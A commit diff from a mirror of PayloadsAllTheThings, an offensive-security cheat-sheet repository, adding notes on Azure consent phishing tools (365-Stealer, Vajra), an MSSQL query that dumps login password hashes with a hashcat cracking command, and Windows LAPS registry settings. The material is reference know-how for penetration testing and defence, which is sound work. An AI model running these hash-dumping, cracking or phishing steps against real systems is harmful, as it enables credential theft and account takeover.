mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-05 11:05:29 +00:00
Vajra + MSSQL hashes
This commit is contained in:
parent
521975a05c
commit
540d3ca399
@ -13,6 +13,10 @@
|
||||
* [Enumeration methodology](#enumeration-methodology)
|
||||
* [Phishing with Evilginx2](#phishing-with-evilginx2)
|
||||
* [Illicit Consent Grant](#illicit-consent-grant)
|
||||
* [Register Application](#register-application)
|
||||
* [Configure Application](#configure-application)
|
||||
* [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated)
|
||||
* [Setup Vajra](#setup-vajra)
|
||||
* [Device Code Phish](#device-code-phish)
|
||||
* [Token from Managed Identity](#token-from-managed-identity)
|
||||
* [Azure API via Powershell](#azure-api-via-powershell)
|
||||
@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
|
||||
* User.ReadBasic.All
|
||||
* User.Read
|
||||
|
||||
### Setup 365-Stealer
|
||||
### Setup 365-Stealer (Deprecated)
|
||||
|
||||
:warning: Default port for 365-Stealer phishing is 443
|
||||
|
||||
@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS
|
||||
- `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token
|
||||
- Find the Phishing URL: go to `https://<IP/Domain>:<Port>` and click on **Read More** button or in the console.
|
||||
|
||||
### Setup Vajra
|
||||
|
||||
> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra
|
||||
|
||||
**Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu".
|
||||
|
||||
|
||||
|
@ -54,6 +54,7 @@
|
||||
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
|
||||
* [Exploiting Impersonation](#exploiting-impersonation)
|
||||
* [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
|
||||
* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
|
||||
* [References](#references)
|
||||
|
||||
## Identify Instances and Databases
|
||||
@ -537,6 +538,21 @@ SELECT ORIGINAL_LOGIN()
|
||||
SELECT SYSTEM_USER
|
||||
```
|
||||
|
||||
### MSSQL Accounts and Hashes
|
||||
|
||||
```sql
|
||||
SELECT name, password_hash FROM sys.sql_logins
|
||||
```
|
||||
|
||||
Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force`
|
||||
|
||||
```ps1
|
||||
131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
|
||||
132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
|
||||
1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
|
||||
|
@ -14,6 +14,7 @@
|
||||
* [Default Writeable Folders](#default-writeable-folders)
|
||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||
* [LAPS Settings](#laps-settings)
|
||||
* [HiveNightmare](#hivenightmare)
|
||||
* [Search for file contents](#search-for-file-contents)
|
||||
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||
@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt
|
||||
|
||||
Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash.
|
||||
|
||||
### LAPS Settings
|
||||
|
||||
Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
|
||||
|
||||
* LAPS Enabled: AdmPwdEnabled
|
||||
* LAPS Admin Account Name: AdminAccountName
|
||||
* LAPS Password Complexity: PasswordComplexity
|
||||
* LAPS Password Length: PasswordLength
|
||||
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
|
||||
|
||||
### HiveNightmare
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user